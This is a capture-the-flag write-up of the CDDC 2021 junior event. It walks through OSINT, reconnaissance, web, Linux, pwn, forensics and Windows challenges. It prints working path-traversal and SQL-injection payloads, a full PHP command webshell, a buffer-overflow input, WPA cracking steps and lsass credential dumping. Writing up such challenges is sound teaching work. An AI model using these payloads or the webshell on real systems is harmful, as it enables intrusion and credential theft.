This page looks best with JavaScript enabled

BrainHack CDDC 2021 Writeups

Hosted by DSTA from 23 June - 25 June

 ·  ☕ 22 min read  ·  🌈🕊️ rainbowpigeon

I joined the Junior Category this year and I’ll be frank: this was quite badly organized. It seems that they did not conduct any proper dry runs of the event. They had broken challenges (missing crucial challenge information, missing code in files, non-functional websites) and the worst thing is that they do not even announce when they are aware of the problem, when they are working on rectifying it, and when they have fixed it. Instead, we were left to figure out ourselves that a particular challenge file had been silently changed, or a vital piece of information was quietly added into some challenge description.
There were also insufficent challenges (or they were of inadequate difficulty) to cover the duration of the event, which rendered their plan and timing of staggered challenge releases meaningless. Many hours before each challenge-release checkpoint, the top teams were already tied by their scores and idling. This means that the final winner would essentially be based only on the last challenge-release – which was a Web mission comprising 3 challenges. But because the final Web challenge was inoperative, the top teams basically came to a tie again while waiting for the challenge to be fixed after solving the other 2. Initially, no one knew it was broken so we did not even know what payloads we sent were supposed to work. And when they said it was supposedly fixed, it wasn’t. Isn’t that disorienting?
Some more side points to note is that they delayed the winners announcement livestream 3 times for a total of 6 hours, and the live scoreboard was alphabetically sorted rather than based on time in the event that scores were tied.
Honestly, what’s even scarier is that I heard the Senior Category had even more serious issues, such as being only able to login a day after the competition started…


Anyway, big shoutout to my team for trying their best to find time to work on this together! We came in 3rd and that’s satisfactory.
🎵 Haywood - Backbeat was a really good tune that I put on for this CTF :)

Placing announcement
Individual player score
Missions completed and team score

Let’s Go Hunting (OSINT)

1. In Front of You

A new startup company called UnbreakableMailSystems develops a cutting-edge security product to prevent modern phishing attacks. They claim that their new product NoMorePhishing-ZX1 can prevent the Global Domination Corporation phishing campaign. Can we trust this product?

Searching for the company in Google brings us to a website unbreakablemailsystems.xyz where the flag is contained in the <meta> tag.

Google search result for 'Unbreakable Mail Systems' is a website

Website's source code shows flag in <meta> tag

Flag: CDDC21{It_was_an_Easy1}

2. Time Travel

One of our team members recommended the new NextCloudSecurity product CLOUDSEC2000TX. I tried to find some information about this product, but I couldn’t find anything. I think some of us are starting to lose it.

Google searching the company name gives us a website again at nextcloudsecurity.xyz except there is no flag.

Google search result for 'Next Cloud Security' is a website

Since the challenge’s title was Time Travel, I thought to check for old archived snapshots of the site using the Wayback Machine. There was one capture with the link to the flag embedded as a HTML comment.

Flag link as HTML comment in archived snapshot of website

Visiting nextcloudsecurity.xyz/NGC_Security/flag.txt gives us the flag.

Flag: CDDC21{_T!me_TraveL_!s_REAl_}

3. Who is GDC?

The GlobalDominationCorporation, also known as GDC, uses several domains for their hostile activities. We only know about one of them; globaldominationcorporation.com. Unfortunately, we can’t provide you with more information. Can you try to gather some more information about them?

This challenge is pretty much the same as one in 2019’s CDDC qualifiers. I’m surprised they reused this considering the solution is unintuitive and somewhat unrealistic in terms of actual OSINT/reconnaissance methodology.

As hinted by the challenge title, run whois on the given domain with -H to omit the unnecessary legal disclaimers in return for more information.

1
whois globaldominationcorporation.com -H

Output:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
...
Registrant Name: John Smith
Registrant Organization: GlobalDominationCorporation
Registrant Street: El Camino Real 
Registrant City: Sunnyvale
Registrant State/Province: CA
Registrant Postal Code: 18144
Registrant Country: US
Registrant Phone: +1.911998058
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: john.s@globaldominationcorporation.com
...

Emailing the registrant gets us an auto-reply with the flag.

Flag: CDDC21{We_are_TheGl0bal_DOminat!on_Corporation!}

4. Name System

It’s unbelievable! Every day, we get a new piece of information about the Global Domination Corporation. Now it’s a new domain, globdominationcorp.com. I tried to check if they have a website at www[.]globdominationcorp.com, but there is nothing there. What else can we do?

I ran Sublist3r https://github.com/aboul3la/Sublist3r which is a very nice tool to enumerate and bruteforce subdomains.

1
sublist3r.py -d globdominationcorp.com -b -v

Output:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
...
globdominationcorp.com
www.globdominationcorp.com
ns1.globdominationcorp.com
ns2.globdominationcorp.com
dev.globdominationcorp.com
www2.globdominationcorp.com
staging.globdominationcorp.com
www1.globdominationcorp.com
internal.globdominationcorp.com
www-dev.globdominationcorp.com
...

Visiting internal.globdominationcorp.com gives us the flag.

Flag: CDDC21{EnumeRation_!s_the_KEY_F0R_EveryTHING!}

5. Broken System

The CryptIT Banking and Consulting company suspects that the GlobalDominationCorporation is attacking its email systems. They need your help to fix the misconfiguration.

Googling for “CryptIT Banking” points us to the website at cryptit.biz which does not contain anything interesting.

Google search result for 'CryptIT Banking' is a website

What did the description mean by “email system misconfigurations”? I googled that and it refreshed my mind that this could be related to SPF/DMARC/DKIM.

While we could dig each individual relevant subdomain like _spf.cryptit.biz to inspect each record as described here https://book.hacktricks.xyz/pentesting/pentesting-smtp#mail-spoofing, I found checkdmarc to be a very useful tool to just retrieve all records for us.

1
checkdmarc cryptit.biz

Output:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
{
  "domain": "cryptit.biz",
  "base_domain": "cryptit.biz",
  "dnssec": false,
  "ns": {
    "hostnames": [
      "ns1.cryptit.biz",
      "ns2.cryptit.biz"
    ],
    "warnings": []
  },
  "mx": {
    "hosts": [],
    "warnings": [
      "No MX records found. Is the domain parked?"
    ]
  },
  "spf": {
    "record": "v=spf1 a mx ?all nice try, but this is not your flag",
    "valid": true,
    "dns_lookups": 2,
    "warnings": [
      "Any text after the all mechanism is ignored",
      "cryptit.biz does not have any MX records"
    ],
    "parsed": {
      "pass": [
        {
          "value": "165.22.102.81",
          "mechanism": "a"
        }
      ],
      "neutral": [],
      "softfail": [],
      "fail": [],
      "include": [],
      "redirect": null,
      "exp": null,
      "all": "neutral"
    }
  },
  "dmarc": {
    "record": null,
    "valid": false,
    "location": null,
    "error": "Unrelated TXT records were discovered. 
    These should be removed, as some receivers may not expect to 
    find unrelated TXT records at _dmarc.cryptit.biz\n\nv=DMARC; p=none; CDDC21{_10x_f0r_yOur_Serv!ce_}"
  }
}

The flag turned out to be stored in the TXT record of the _dmarc.cryptit.biz subdomain (line 48).

Flag: CDDC21{_10x_f0r_yOur_Serv!ce_}

Going Active (Reconnaissance)

4. VH2-1

I know you are getting tired, but don’t give up! This is your last task for now. Take a look at this web server, and let me know if you find anything.

hxxp://dev-01.globaldominationcorporation.xyz

The site given just displays a scary message saying we are not allowed to access it.

'You're not allowed to access this server' message on website

I first checked for subdomains using Sublist3r.

1
sublist3r.py -d globaldominationcorporation.xyz -b -vv

Output

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
SSL Certificates: dev-02.globaldominationcorporation.xyz
SSL Certificates: gdc-internal-02.globaldominationcorporation.xyz
SSL Certificates: dev-01.globaldominationcorporation.xyz
SSL Certificates: gdc-internal-01.globaldominationcorporation.xyz
SSL Certificates: gdc-internal.globaldominationcorporation.xyz
SSL Certificates: www-dev.globaldominationcorporation.xyz
[-] Starting bruteforce module now using subbrute..
globaldominationcorporation.xyz
www.globaldominationcorporation.xyz
ns1.globaldominationcorporation.xyz
ns2.globaldominationcorporation.xyz

Nice. But those internal subdomains all gave an unknown host error.

Unknown host error when visiting internal subdomain websites

What’s going on here? I stared at the challenge title for long and then it clicked: VH stood for ‘Virtual Hosts’. Though all the subdomains discovered above (internal and public) are distinct websites, they are all probably hosted on a single server with just one IP address. One way the server can route our traffic to the correct website is by inspecting the Host header in our HTTP request.
Thus, we can perform a HTTP Host header attack where we send a HTTP request to the IP address of the public website dev-01.globaldominationcorporation.xyz but with the Host header modified to the internal website gdc-internal-01.globaldominationcorporation.xyz .

Request to dev-01.globaldominationcorporation.xyz

1
2
3
GET / HTTP/1.1
Host: gdc-internal-01.globaldominationcorporation.xyz
Connection: close

Response

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
  <head>
    <meta charset="utf-8">
    <meta name="robots" content="noindex">
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Baloo+Tammudu+2&family=Inconsolata:wght@500&display=swap" rel="stylesheet">
    <title>GDC WEB-DEV</title>
  </head>
  <body>
    <h1>CDDC21{We1c0me_T0_VH2}</h1>
  </body>

Flag: CDDC21{We1c0me_T0_VH2}

Linux Rules the World! (Linux)

1. Lock and Key

One of TheKeepers has successfully obtained what seems to be one of the GDC private servers. He has sent me the image and another file, but unfortunately, I’m not great with Linux. I think you’re the one for this mission.

Target: 13.213.91.240

Link: http://157.230.241.173/0x0301/iqWSmA/m1/file.zip

SHA256: a3fd0b01c5a12f830928cdd62bca7ab322610377c2b696f3313b734646bc2ae3

Inside the zip file is cybot01_bot1.key which contains an OpenSSH private key. I had no credentials to SSH with, so I googled and I came across this https://stackoverflow.com/questions/3818886/how-do-i-add-a-password-to-an-openssh-private-key-that-was-generated-without-a-p. Basically, ssh-keygen will show us the username to use as well as allow us to set a new password. After that, we can SSH in using the new private key file and retrieve the flag.

1
2
3
4
5
6
root@kali:~/Downloads# chmod 600 cybot01_bot1.key 
root@kali:~/Downloads# ssh-keygen -p -f cybot01_bot1.key 
Key has comment 'bot1@ip-172-31-34-218'
Enter new passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved with the new passphrase.
1
2
3
root@kali:~/Downloads# ssh -i cybot01_bot1.key bot1@13.213.91.240
Enter passphrase for key 'cybot01_bot1.key': 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-1035-aws x86_64)

Retrieving flag.txt after SSH'ing in

Flag: CDDC21{b0t_eNtR3nC3}

Web Takedown Episode 1 (Web Vulnerabilities)

4. Traversal

I know that this server is vulnerable, but I can’t exploit it. Show your skills and find the right file.

Target URL: http://13.251.148.233/4HOF3DTV

The website contains navigation links which seem vulnerable to Local File Inclusion and Path Traversal attacks. The challenge title is also a big hint.

1
2
3
4
5
6
<div class="nav-bar">
	<img class="logo" src="images/logo.png">
		<a class="active" href=?page=home.php>Home</a>
		<a href=?page=about.php>About</a>
		<a href=?page=serives.php>Services</a>
</div>

Interestingly, Burp Suite automatically solved this for me after I ran an “Active Scan” on the target website. It used the following payload to retrieve /etc/passwd:

1
2
GET /4HOF3DTV/?page=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1
Host: 13.251.148.233
1
2
3
4
5
6
7
8
root:​x:0:0:root:/root:/bin/bash
daemon:​x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:​x:2:2:bin:/bin:/usr/sbin/nologin
sys:​x:3:3:sys:/dev:/usr/sbin/nologin
...
lxd:​x:998:​100::/var/snap/lxd/common/lxd:/bin/false
mysql:​x:113:120:MySQL Server,,,:/nonexistent:/bin/false
flag:​x:7777:7777:CDDC21{!_like_the_PASSWD-F!le!},,,:/home/user:/usr/sbin/nologin

Flag: CDDC21{!_like_the_PASSWD-F!le!}

5. Bypass

Finally, we have found an interesting web server used by the GDC, but I don’t have credentials so I can’t bypass the login page. I heard that you are the master of injections.

Target URL: http://13.251.148.233/D6IS1E8V

The website has a login form that gives a ‘No rows to show’ error message upon submission of invalid credentials.

Login form on website with 'no rows to show' error message

The concept of rows being selected suggests SQL is at play, and my teammate TheMythologist identified the SQL injection vulnerability to be present in the password parameter.

Request with single quote:

1
2
3
4
5
6
7
POST /D6IS1E8V/ HTTP/1.1
Host: 13.251.148.233
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 41

username=test&password='&sub=&remember=on

Response with 500 error:

1
2
3
4
5
6
HTTP/1.0 500 Internal Server Error
Date: Wed, 23 Jun 2021 12:57:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 962
Connection: close
Content-Type: text/html; charset=UTF-8

Modifying our payload to username=test&password='+OR+'1'%3d'1&sub=&remember=on to match and return all rows gives us a new error message complaining of too many matches.

1
<div class="msg"><h3>To many matches. Try again.</h3></div>

Limiting the number of returned rows to 1 by changing to password='+OR+'1'%3d'1'+limit+1--+ successfully returns credentials in the form of [[1,"john","cDR21afzss8"]] which unfortunately do not work.

Checking out the next row with password='+OR+'1'%3d'1'+limit+1,1--+, where the additional 1 parameter indicates offset, we get the flag: [[2,"flag","CDDC21{-Inject_Me-}"]].

Final payload:

1
2
3
4
5
6
7
POST /D6IS1E8V/ HTTP/1.1
Host: 13.251.148.233
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 41

username=test&password='+OR+'1'%3d'1'+limit+1,1--+&sub=&remember=on

Flag: CDDC21{-Inject_Me-}

Web Takedown Episode 2 (Web Vulnerabilities)

3. Restrictions

Strangely, the GDC allows this feature in their private web server. It looks pretty easy to exploit it. Let’s give it a try…

Target URL: http://18.139.27.125/H3YNQA42

The website has a file uploading feature. Uploads go under uploads/, and there is a file size check where Sorry, your file is too large or too small. is output if the check fails, but this shouldn’t hinder the rest of our solution. Attempting to upload a .php file returns an error message indicating that only JPG, JPEG, PNG and GIF files are allowed.

Uploading PHP file gives error message indicating that only image file formats are allowed

It is peculiar, then, that we can upload a .txt file. This suggests that the file extension check is blacklist-based, rather than a whitelist of image extensions.

Request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
POST /H3YNQA42/ HTTP/1.1
Host: 18.139.27.125
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxyZsG3EAoHtmVnCI
Connection: close
Content-Length: 381

------WebKitFormBoundaryxyZsG3EAoHtmVnCI
Content-Disposition: form-data; name="fileupload"; filename="asd.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
------WebKitFormBoundaryxyZsG3EAoHtmVnCI
Content-Disposition: form-data; name="upload"


------WebKitFormBoundaryxyZsG3EAoHtmVnCI--

Response:

1
<div class='msg'><h3>The file has been uploaded to <u>uploads/asd.txt</u></h3></div>

Since we just need to find an alternative to the blacklisted .php extension, we can try and use .phar as briefly pointed out here https://book.hacktricks.xyz/pentesting-web/file-upload#special-extension-tricks. Like .php, it is also a format for executing PHP code.

Using this neat PHP webshell from https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985, we upload our file and see that it has been accepted.

Request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
POST /H3YNQA42/ HTTP/1.1
Host: 18.139.27.125
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3A1bUePy0HCwHmB6
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 657

------WebKitFormBoundary3A1bUePy0HCwHmB6
Content-Disposition: form-data; name="fileupload"; filename="1wpidnasd.phar"
Content-Type: application/x-php

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
------WebKitFormBoundary3A1bUePy0HCwHmB6
Content-Disposition: form-data; name="upload"


------WebKitFormBoundary3A1bUePy0HCwHmB6--

Response:

1
<div class='msg'><h3>The file has been uploaded to <u>uploads/1wpidnasd.phar</u></h3></div>

We can now access our webshell at http://18.139.27.125/H3YNQA42/uploads/1wpidnasd.phar.

'ls' command ran on .phar webshell

The flag is in the directory above.

'ls ../' command ran on .phar webshell shows flag-b7oXC.txt

'cat ../flag-b7oXC.txt' command ran on .phar webshell for flag contents

Flag: CDDC21{s4F3_uPl04dZ}

File it Away (Pwn)

2. Smash It

One of the GDC servers was pawned by one of the resistance security teams years ago, and it seems their server is still up. We know it allows us to input messages, but we have never received any. We have given you the binary. Can you help us to understand what it expects to get?

Target: 13.213.195.207 port 60120

Link: http://157.230.241.173/0x0601/75k9tg/m2/file.zip

SHA256: bd5de768f001874a9dea5dbc8c19b1e1b51b684a812ec6bc304000f1de8f69bf

gdc_evidence_01 inside the ZIP file given is a x86 ELF binary. Below is the pseudocode generated by IDA:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[64]; // [esp+0h] [ebp-4Ch] BYREF
  int v5; // [esp+40h] [ebp-Ch]
  int *v6; // [esp+44h] [ebp-8h]

  v6 = &argc;
  v5 = 0;
  puts("Enter passphrase:");
  fflush(stdout);
  gets(s);
  if ( v5 == 'CDDC' )
  {
    system("cat flag.txt");
    exit(0);
  }
  puts("Try again...");
  return 0;
}

User input is taken in and stored in a 64-byte stack-based buffer s by the gets function which does not have any bounds checking. The next stack-based variable v5 is then checked to be 'CDDC' for the flag to be printed.
Thus, this is a simple stack-based buffer overflow exploitation where our input in s can overflow into v5 and overwrite it with arbitrary data. We supply 64 characters to fully fill up the s buffer and then 4 more letters 'CDDC' to be written into v5.

1
2
3
4
root@kali:~/CDDC# nc 13.213.195.207 60120
Enter passphrase:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0ACDDC
CDDC21{st4ck_0v3wr1TiN8}

Flag: CDDC21{st4ck_0v3wr1TiN8}

Post Mortem (Forensics)

2. Find The Code

Members of the Keepers group were able to capture some traffic. They believed it contained one of the secret codes. Help them find it.

Note: You need to insert the correct code to the flag structure. For example: CDDC21{code}

Link: http://157.230.241.173/0x0701/Eic0Sa/m2/file.zip

SHA256: 54c85637c324b5d297aa36196ff2102019baf74185ea505a90c9d435f1dcdfa3

I opened the given cap.pcap in Wireshark and took a look at the Protocol Hierarchy Statistics to get an overview of what kind of traffic the capture contained.

Wireshark Protocol Hierarchy Statistics show significant FTP Data traffic in terms of Percent Bytes

There is a good amount of FTP Data traffic so let’s first check that out with a ftp display filter.

Applying 'ftp' display filter to see FTP commands and responses

From the FTP command RETR install.iso issued in packet 71 as well as the responses following it, we understand that the file install.iso is downloaded from the FTP server.
Let’s follow the TCP stream of the FTP Data constituting install.iso so that we can extract it out.

Applying 'ftp-data' display filter and following TCP stream of the packets making up 'install.iso'

Saving entire raw TCP conversation that makes up 'install.iso' as a file

After extracting and saving install.iso, I checked for its file format with Linux’s file command:

1
2
root@kali:~/CDDC# file install.iso 
install.iso: EWF/Expert Witness/EnCase image file format

I googled for what to do with an EWF file and came across this https://www.andreafortuna.org/2018/04/11/how-to-mount-an-ewf-image-file-e01-on-linux/. So let’s get right into the commands needed to mount and view the image file.

Commands:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
root@kali:~/CDDC# apt install ewf-tools
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
ewf-tools is already the newest version (20140807-2+b2).
The following packages were automatically installed and are no longer required:
  libxml-dom-perl libxml-perl libxml-regexp-perl
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 292 not upgraded.
root@kali:~/CDDC# mkdir rawimage
root@kali:~/CDDC# mv install.iso install.e01
root@kali:~/CDDC# ewfmount install.e01 ./rawimage/
ewfmount 20140807

root@kali:~/CDDC# mkdir mountpoint
root@kali:~/CDDC# mount ./rawimage/ewf1 ./mountpoint/ -o ro,loop,show_sys_files,streams_interace=windows

Image contents:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
root@kali:~/CDDC# ls -la mountpoint/
total 3000
drwxrwxrwx 1 root root    4096 May 26 04:18  .
drwxr-xr-x 6 root root    4096 Jun 23 21:28  ..
-rwxrwxrwx 1 root root    2560 May 23 06:41 '$AttrDef'
-rwxrwxrwx 1 root root       0 May 23 06:41 '$BadClus'
-rwxrwxrwx 1 root root     608 May 23 06:41 '$Bitmap'
-rwxrwxrwx 1 root root    8192 May 23 06:41 '$Boot'
drwxrwxrwx 1 root root       0 May 23 06:41 '$Extend'
-rwxrwxrwx 1 root root 2097152 May 23 06:41 '$LogFile'
-rwxrwxrwx 1 root root    4096 May 23 06:41 '$MFTMirr'
drwxrwxrwx 1 root root       0 May 23 06:43 '$RECYCLE.BIN'
---------- 1 root root       0 May 23 06:41 '$Secure'
-rwxrwxrwx 1 root root  131072 May 23 06:41 '$UpCase'
-rwxrwxrwx 1 root root       0 May 23 06:41 '$Volume'
-rwxrwxrwx 1 root root   17134 May 23 06:42  f1.jpg
-rwxrwxrwx 1 root root   69183 May 23 06:43  f2.jpg
-rwxrwxrwx 1 root root  716476 May 26 04:18  Picture.png
-rwxrwxrwx 1 root root    7168 Apr 11 03:47  run_me.exe
drwxrwxrwx 1 root root       0 May 26 04:16 'System Volume Information'

The code for the flag is then contained in Picture.png.

Nuclear Weapons Access Code written in 'Picture.png'

Flag: CDDC21{GlobalDomination75649654}

3. WPA

The resistance has successfully intercepted encrypted WiFi traffic from a Cyber-BOT believed to communicate with the HQ. It is your task as a security analyst and cyber expert to decrypt the traffic and find out if there is any valuable information about the communication.

Link: hxxp://157.230.241.173/0x0701/fo5Nuj/m3/file.zip

SHA256: ab693cbac1da5489ff5b41e8672c8ed77015e11ca268dafc35e5310703359a6d

The given pcap.cap contains encrypted WPA IEEE 802.11 traffic. Since the capture contains the 802.11 authentication process with the EAPOL 4-way handshake in packets 340, 341, 343, and 345, and we know the SSID is CyBots as seen in packet 336, the steps to decrypt the traffic are almost the same as in this old challenge I did for UMDCTF 2021. The documentation referenced back then was this https://www.cisco.com/c/en/us/support/docs/wireless-mobility/80211/200527-Fundamentals-of-802-11-Wireless-Sniffing.html#anc63.

IEEE 802.11 authentication and 4-way EAPOL handshake captured in Wireshark

We first convert the network capture file to a format for cracking. In this case, the difference from the challenge in UMDCTF 2021 is that we use -j to output to a format for John the Ripper instead of -z for a hashcat format.

1
hcxpcaptool -E essidlist -j output.john pcap.cap

hcxpcaptool reads the capture file and outputs the WPA handshake to a file for cracking

Then, we run john on output.john and the WPA password is cracked to be 0123456789.

John the Ripper cracks the WPA password to be 0123456789

Now, we can enter the WPA password of 0123456789 as a decryption key for the IEEE 802.11 protocol in Wireshark’s preferences.

Entering wpa-pwd decryption key for the IEEE 802.11 protocol in Wireshark's preferences

In the decrypted traffic, I looked at the HTTP object list and spotted an interesting HTML page with title ‘CDDC21’ and a flag emoji returned by 128.199.189.32 in packet 745.

Wireshark's HTTP object list shows single HTML webpage response of 228 bytes from an unknown hostname

Visiting the site at http://128.199.189.32 gives us the flag.

Flag displayed on website at http://128.199.189.32

Flag: CDDC21{-DecRypted_WPA-}

Behind the Mask (Windows)

1. Hello Guest

It’s time to expose the GDC! We have successfully obtained the IP address of their AD server. Enumerate the target machine and find the secret file.

Target IP Address: 54.255.213.169

Run nmap scan and see that SMB shares are available to explore via port 445.

1
nmap -sV -n -Pn -vvv 54.255.213.169

Output:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
53/tcp   open  domain        syn-ack ttl 128 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2021-06-24 08:41:58Z)
135/tcp  open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: gdc.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds  syn-ack ttl 128 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: GDC)
464/tcp  open  kpasswd5?     syn-ack ttl 128
593/tcp  open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 128
3268/tcp open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: gdc.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 128
3389/tcp open  ms-wbt-server syn-ack ttl 128 Microsoft Terminal Services
Service Info: Host: GDC-DC-J; OS: Windows; CPE: cpe:/o:microsoft:windows

Since the challenge title says ‘Guest’, I assumed we were expected to authenticate to the SMB shares with the guest account (which by default has no password).
While we could connect using smbclient -U guest -L //54.255.213.169, I found crackmapexec and smbmap to be better tools.
crackmapexec tells us what shares there are and what permissions we have for them.

1
crackmapexec smb 54.255.213.169 -u "guest" -p "" --shares

Output:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
SMB         54.255.213.169  445    GDC-DC-J         [*] Windows Server 2016 Datacenter 14393 x64 (name:GDC-DC-J) (domain:gdc.local) (signing:True) (SMBv1:True)
SMB         54.255.213.169  445    GDC-DC-J         [+] gdc.local\guest: 
SMB         54.255.213.169  445    GDC-DC-J         [+] Enumerated shares
SMB         54.255.213.169  445    GDC-DC-J         Share           Permissions     Remark
SMB         54.255.213.169  445    GDC-DC-J         -----           -----------     ------
SMB         54.255.213.169  445    GDC-DC-J         ADMIN$                          Remote Admin
SMB         54.255.213.169  445    GDC-DC-J         Backup          READ            
SMB         54.255.213.169  445    GDC-DC-J         C$                              Default share
SMB         54.255.213.169  445    GDC-DC-J         Forensics1                      
SMB         54.255.213.169  445    GDC-DC-J         Forensics2                      
SMB         54.255.213.169  445    GDC-DC-J         IPC$                            Remote IPC
SMB         54.255.213.169  445    GDC-DC-J         NETLOGON                        Logon server share 
SMB         54.255.213.169  445    GDC-DC-J         SYSVOL                          Logon server share 
SMB         54.255.213.169  445    GDC-DC-J         Users           READ            

We have read permissions to a Backup share, so let’s recursively list the contents of this share with smbmap.

1
smbmap -H 54.255.213.169 -u "guest" -p "" -R Backup

Output:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
[+] IP: 54.255.213.169:445	Name: ec2-54-255-213-169.ap-southeast-1.compute.amazonaws.com
Disk                                                  	Permissions	Comment
----                                                  	-----------	-------
Backup                                            	READ ONLY	
.\Backup\*
dr--r--r--                0 Thu Jun 17 18:08:07 2021	.
dr--r--r--                0 Thu Jun 17 18:08:07 2021	..
fr--r--r--               19 Thu Jun 17 12:25:40 2021	flag.txt
dr--r--r--                0 Thu Jun 17 18:08:07 2021	Temp
.\Backup\Temp\*
dr--r--r--                0 Thu Jun 17 18:08:07 2021	.
dr--r--r--                0 Thu Jun 17 18:08:07 2021	..
fr--r--r--               23 Thu Jun 17 18:08:07 2021	Alex.txt

Both .txt files seem interesting so let’s download them.

1
2
smbmap -H 54.255.213.169 -u "guest" -p "" --download Backup\flag.txt
smbmap -H 54.255.213.169 -u "guest" -p "" --download Backup\Temp\Alex.txt

flag.txt contains the flag while Alex.txt contains what appears to be credentials:

1
2
alexander.p
v#X1nOLqPZ

Flag: CDDC21{0LLHE_Gue$T}

2. Old Memories

The file you have found in the shared folder looks like a memory dump that may contain user passwords. You need these passwords for your next mission.

With the new alexander.p credentials obtained from stage 1. Hello Guest, we recheck our permissions for the shares and find that we have read permissions for the interestingly-named Forensics1 share now.

1
crackmapexec smb 54.255.213.169 -u "alexander.p" -p "v#X1nOLqPZ" --shares

Output:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
SMB         54.255.213.169  445    GDC-DC-J         [*] Windows Server 2016 Datacenter 14393 x64 (name:GDC-DC-J) (domain:gdc.local) (signing:True) (SMBv1:True)
SMB         54.255.213.169  445    GDC-DC-J         [+] gdc.local\alexander.p:v#X1nOLqPZ 
SMB         54.255.213.169  445    GDC-DC-J         [+] Enumerated shares
SMB         54.255.213.169  445    GDC-DC-J         Share           Permissions     Remark
SMB         54.255.213.169  445    GDC-DC-J         -----           -----------     ------
SMB         54.255.213.169  445    GDC-DC-J         ADMIN$                          Remote Admin
SMB         54.255.213.169  445    GDC-DC-J         Backup          READ            
SMB         54.255.213.169  445    GDC-DC-J         C$                              Default share
SMB         54.255.213.169  445    GDC-DC-J         Forensics1      READ            
SMB         54.255.213.169  445    GDC-DC-J         Forensics2                      
SMB         54.255.213.169  445    GDC-DC-J         IPC$                            Remote IPC
SMB         54.255.213.169  445    GDC-DC-J         NETLOGON        READ            Logon server share 
SMB         54.255.213.169  445    GDC-DC-J         SYSVOL          READ            Logon server share 
SMB         54.255.213.169  445    GDC-DC-J         Users           READ            

Listing the contents of the share:

1
smbmap -H 54.255.213.169 -u "alexander.p" -p "v#X1nOLqPZ" -R Forensics1

Output:

1
2
3
4
5
6
7
8
[+] IP: 54.255.213.169:445	Name: ec2-54-255-213-169.ap-southeast-1.compute.amazonaws.com
Disk                                                  	Permissions	Comment
----                                                  	-----------	-------
Forensics1                                        	READ ONLY	
.\Forensics1\*
dr--r--r--                0 Thu Jun 17 18:08:07 2021	.
dr--r--r--                0 Thu Jun 17 18:08:07 2021	..
fr--r--r--         16752544 Thu Jun 17 17:58:49 2021	lsass.zip

lsass.zip is interesting and contains lsass.DMP. This is the memory dump mentioned in the challenge description and it is of the lsass.exe process which we can extract credentials from using tools like mimikatz for Windows or pypykatz for Linux.

1
pypykatz lsa minidump lsass.DMP | grep -v None | grep password -B 4

and we basically get two credentials in the output – one of which contains the flag:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
--  Domain: DESKTOP-2QFHHML
== WDIGEST [e0b3a]==
  username Flag
  domainname DESKTOP-2QFHHML
  password CDDC21{lsa$$_DUMP_password}
--
  SHA1: 1075eeefce15aa2008f2e0594babccc09cdf5d4b
== WDIGEST [2f9f2]==
  username John
  domainname DESKTOP-2QFHHML
  password #johnIStheBEST!

